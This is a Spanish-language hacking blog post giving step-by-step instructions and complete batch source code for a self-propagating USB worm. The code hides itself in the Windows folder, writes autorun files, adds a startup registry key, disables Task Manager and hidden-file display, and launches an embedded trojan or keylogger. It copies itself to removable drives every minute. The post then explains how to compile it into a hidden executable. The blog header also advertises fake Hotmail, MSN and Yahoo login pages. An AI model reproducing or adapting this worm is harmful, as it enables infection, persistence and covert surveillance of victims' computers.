Murd0c

Envio de sms gratis, Fakes de hotmail, Fakes de Msn, Fakes de Yahoo, Manuales, Tutoriales, Hacking, Defacing, Prehacking, Cracks, Programas Gratis, Pensamientos, Links y Mucho mas

HOW-TO Crear Gusano de Memorias USB en BATCH
sábado, marzo 15, 2008

Herramientas a utilizar:

Quick_Batch_File_Compiler_3.1.5.0
que pueden descargar del siguiente enlace
http://rapidshare.com/files/97127487/Quick_Batch_File_Compiler_3.1.5.0.rar.html

Bueno en esta ocasión les tratare de explicar en breves palabras como crear su propio worm programado en batch.

Considero que es una buena respuesta para todos aquellos que buscan programas ya hechos que hagan estas funciones, cuando resulta mas fácil aprender a programarse el suyo.

Como se que muchos de aqui nunca en su vida han programado algo, a excepción de unos cuantos bats, pues queria poner de ejemplo un código para que puedan realizar sus propias pruebas y aprender por si solos.

Aclaro que si eres programador, este manual definitivamente no te servirá, pero si eres alguien curioso que quiere aprender y no tiene idea de programación, este manual te puede ser de gran ayuda.

Empezare dando una breve explicación de lo que hará nuestro worm y las funciones que realiza

Básicamente lo que hará nuestro script es lo siguiente

*copiarse a si mismo a una carpeta en windows
*crear el autorun que posteriormente será copiado en la memoria extraible USB
*añadirse al inicio de windows
*alterar registro de windows para cancelar opciones del sistema
*ejecuta tu troyano, keylogger o lo que quieras
*si encuentra una unidad donde copiarse, se copia junto con su autorun
*se añade atributos de oculto, sistema y solo lectura
*espera aprox. 60 segundos y repite el ciclo


de esta forma dotamos a nuestro programa de la habilidad de propagarse por si solo.
con un poco de ayuda de la victima claro esta

Bien ahora que sabes lo que el gusano hará te paso a explicar brevemente las funciones que utilice en el código

SET Sirve para definir una variable, por ejemplo
SET perro=firulais
de esa forma podemos cambiar el nombre del perro sin tener que hacerlo en cada una de las expreciones donde hagamos referencia a firulais.

ECHO Este comando basicamente sirve para "imprimir" en pantalla algun texto.

">" Este simbolo lo utilizamos para redirigir la salida de un comando, o tambien para comparar valores.

En este caso la salida del comando ECHO la dirigimos hacia un archivo de texto

IF NOT EXIST Este condicional se utiliza de la siguiente manera
SI NO EXISTE ... ENTONCES HAS ESTO
sirve para realizar acciones siempre y cuando se cumpla o no una condicion

Los demas son comandos basicos de la shell de windows CMD.EXE


Como funcionara el worm?
bien lo que haremos sera utilizar la herramientas antes mencionada para compilarlo y obtener un EXE que se ejecute de manera OCULTA, de esa forma no tendremos problemas con la tipica pantalla negra de los batch


el codigo del worm lo explique en cada seccion.

Código
@ECHO OFF
REM          _______..___________.     ___      .______      
REM         /       ||           |    /   \     |   _  \     
REM        |   (----``---|  |----`   /  ^  \    |  |_)  |    
REM         \   \        |  |       /  /_\  \   |      /     
REM     .----)   |       |  |      /  _____  \  |  |\  \----.
REM     |_______/        |__|     /__/     \__\ | _| `._____|
REM     ____    __    ____   ______   .______      .___  ___. 
REM     \   \  /  \  /   /  /  __  \  |   _  \     |   \/   | 
REM      \   \/    \/   /  |  |  |  | |  |_)  |    |  \  /  | 
REM       \            /   |  |  |  | |      /     |  |\/|  | 
REM        \    /\    /    |  `--'  | |  |\  \----.|  |  |  | 
REM         \__/  \__/      \______/  | _| `._____||__|  |__| 
REM
REM    ____  ____  _________  ____  ____  ____  ____  ____  ____ 
REM   ||B ||||Y ||||       ||||O ||||C ||||T ||||A ||||L ||||H ||
REM   ||__||||__||||_______||||__||||__||||__||||__||||__||||__||
REM   |/__\||/__\||/_______\||/__\||/__\||/__\||/__\||/__\||/__\|
REM                                                      
REM
REM DESCRIPCION: Codigo en batch que copia un archivo "X" a "X" unidad
REM                   [   OCTALH@GMAIL.COM   ]                                                 
REM

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

            SET WORMORIGINAL=juego.exe
            REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
            SET WORM=1044404.EXE
            REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

SET AUTORUNORIGINAL=%WINDIR%\14785\WINUPDATE.DLL
REM DIRECCION COMPLETA DEL AUTORUN ESCONDIDO

SET AUTORUN=autorun.inf
REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM CREA UN DIRECTORIO EN LA CARPETA WINDOWS
MD "%WINDIR%\14785"

REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

REM COPIA EL WORM A EL DIRECTORIO DE WINDOWS PARA OCULTARLO
COPY %WORMORIGINAL% "%WINDIR%\14785\SYSTEMSHELL.exe"
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

REM SE AGREGA AL INICIO DEL SISTEMA
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f
REM SE DESACTIVA EL ADMINISTRADOR DE TAREAS
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f
REM SE DESACTIVA LA OPCION DE VER ARCHIVOS OCULTOS
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f

:CHEKARWORM

REM VERIFICA LA EXISTENCIA DEL WORM

IF NOT EXIST "D:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "E:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "F:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "G:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "H:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "I:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "J:\%WORM%" GOTO COPIARWORM


:COPIARWORM

REM COPIA EL WORM Y LE ASIGNA ATRIBUTOS DE SOLO LECTURA
REM SISTEMA Y OCULTO.

COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%WORM%"
ATTRIB +S +H +R "E:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%WORM%"
ATTRIB +S +H +R "F:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%WORM%"
ATTRIB +S +H +R "G:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%WORM%"
ATTRIB +S +H +R "H:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%WORM%"
ATTRIB +S +H +R "I:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%WORM%"
ATTRIB +S +H +R "J:\%WORM%"

REM COPIADO DEL AUTORUN Y ASIGANCION DE ATRIBUTOS

COPY "%AUTORUNORIGINAL%" "E:\%AUTORUN%"
ATTRIB +S +H +R "E:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "F:\%AUTORUN%"
ATTRIB +S +H +R "F:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "G:\%AUTORUN%"
ATTRIB +S +H +R "G:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "H:\%AUTORUN%"
ATTRIB +S +H +R "H:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "I:\%AUTORUN%"
ATTRIB +S +H +R "I:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "J:\%AUTORUN%"
ATTRIB +S +H +R "J:\%AUTORUN%"

GOTO LOOP


:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM


bien ahora explicare como utilizar el codigo.

lo primero sera fijarce en esta parte del codigo

Código:
                 SET WORMORIGINAL=juego.exe
             REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
             SET WORM=1044404.EXE
             REM NOMBRE QUE TENDRA EN LA MEMORIA USB

Es indispensable que la variable WORMORIGINAL=juego.exe tenga el mismo nombre que el worm unaves compilado con QUICK BATCH FILE COMPILER

Tambien verifica esta parte del codigo

Código:
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

aqui donde dice server.exe tiene que tener el mismo nombre que el archivo a adjuntar en el QUICK BATCH FILE COMPILER.

Para compilar tu worm solo tienes que copiar el codigo en el QUICK BATCH FILE COMPILER

te debe quedar algo asi


Ahora haremos que se ejecute de forma oculta, para eso nos vamos a project, optiones y activamos la opcion Gost aplication



Ahora debes agregar tu aplicacion a propagar, puede ser un server de troyano, keylogger etc etc...
para eso vamos a la pestaña Embedded Files y damos click en el icono de la cruz verde y posteriormente añadimos nuestra aplicacion, tambien pueden agregar un icono personalizado en esta pestaña.



recuerda que este archivo se debe llamar como lo indicaste en
Código:
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

ahora precionamos F9 para compilarlo y listo!!, ahora tienes tu propio worm programado en batch.


Bien con esto llegamos al final de esta pequeña guia, espero que haya sido de tu agrado

http://foro.elhacker.net/index.php/topic,203100.0.html

posted by Murdoc @ 12:53 a.m.,

0 Comments:

Publicar un comentario

<< Home

Estadistikas

 

Eres el visitante numero

Segun tu Ip me Visitas de

IP Address Lookup

Acerca de este blog

Este blog es una recopilacion de informacion relacionada con la computadora, tambien escribo lo ke pasa en mi vida, pensamientos o cualkier cosa ke se me ocurra, la plantilla la buske en internet y la modifike un poco, pero dejandole los creditos.

Contacto

Para cualquier contacto enviame un correo o agregame en tu Msn, mi correo es Murd0c.in.utero@gmail.com o dejame un comentario en le Tag-Board.

 

 

 

Descargas

Utilidades Online

Foros

Archives

Previous Posts

Powered By

Powered by Blogger